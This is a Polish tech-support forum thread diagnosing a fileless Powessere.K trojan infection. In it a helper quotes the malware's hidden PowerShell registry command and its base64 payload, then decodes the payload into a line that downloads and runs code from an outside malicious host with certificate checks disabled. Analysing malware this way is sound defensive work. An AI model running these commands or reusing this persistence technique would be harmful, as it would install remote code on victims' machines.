Wykryto zagrożenie: Trojan:Win32/Powessere.K

Na koncie Waldek według Windows Defendera wszystko jest ok

Addition.txt (24,5 KB) FRST.txt (88,6 KB) Shortcut.txt (30,0 KB)

Wrzucam zrzut z Windows Defendera, dotyczący tego zagrożenia. Wygląda to dla mnie tak jakby na początku po zalogowaniu wykrywał zagrożenie, a po chwili samodzielnie je neutralizował, dlatego też na zrzucie widnieje “Zablokowane zagrożenie”. Na koncie Waldek z kolei nie pojawia się żadne ostrzeżenie.

Windows%20Defender

1 polubienie

a nie, przepraszam, sprawdziłem jeszcze raz i na koncie Waldek, także pojawia się ostrzeżenie

1 polubienie

Wróć do głównego profilu

Pobierz i uruchom skaner RogueKiller

Wklej plik wynikowy, lub zrób zrzut ekranu z wyników

as_D5D7.tmp.txt (2,0 KB)

Znowu nic :wink:
Kolejny skaner powinien coś znaleźć.
W innych wersjach zagrożeń wykrywał ukryte wpisy w rejestrze.
Pobierz i zrób skan, udostępnij rezultat

Znów nic nie wykryto, ale nawet Windows Defender nie pokazuje już zagrożenia.

Nie wiem tylko co pomogło i czy oznacza to faktycznie brak infekcji. W każdym razie wszystko wygląda dobrze.

CmdLine: C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe -W Hidden -Exec -nop $t=Get-ItemProperty -Path ‘HKCU:\Software\Classes\mssccfile’ -Name t;IEX $t.t;

C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe

cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe

https://www.virustotal.com/en-gb/user/larsbehrens/

Ja bym plik skopiował i wysłał na VirusTotal bo wygląda na to ze *Defender się myli.
A jeśli tak to dodałbym go do wykluczeń.

No i kolejna zagadka nie rozwiązana do końca.
Nadal obserwuj, licho nie śpi :wink:

Wygląda jak błąd “kopiuj-wklej” :wink: ale wiem na co chciałeś zwrócić uwagę.
Ta wersja Powessere.K jest aktywowana wyłącznie w rejestrze bezplikowo

Druga część jest powiązana z kolejnym wpisem w rejestrze, który aktywuje następne polecenia.
HKEY_CURRENT_USER\Software\Classes\mssccfile
t REG_SZ $EncodedText = 'WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAgACQAdAByAHUAZQAgAH0AOwAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBpAGQAcgBlAHoAZQByAHYALgBpAG4AZgBvADoANAA0ADMALwBkAGUAYgB1AGcALwBkAG8AdwBuAGwAbwBhAGQALwBzAC8AYwBjAFYARAAnACkAOwA=';$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText)); IEX $DecodedText

Co po odkodowaniu daje polecenie
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; IEX (New-Object Net.WebClient).DownloadString('https://ridrezerv.info:443/debug/download/s/ccVD');

Adres docelowy jest wykrywany jako Malware
VirusTotal

Zabiorę się za zbadanie payloadu <3 Wygląda jak Brusha Loader

1 polubienie

To nie jest błąd kopiowania. Te cyrki miały miejsce w trakcie aktualizacji systemu.
Ścieżka do pliku jest prawidłowa.

Masz to u siebie? U niego też jest ?

Moim AV jest Windows Defender. Przy umiejetnym skonfigurowaniu jest świetny.
Jego skaner jest w/g portali testowych 100%
Ale jego false positive? Raczej spore.

Spore
Co za problem skopiować plik i przeskanować
A tak przy okazji.

Zwracam uwagę na tekst. Po dzisiejszej aktualizacji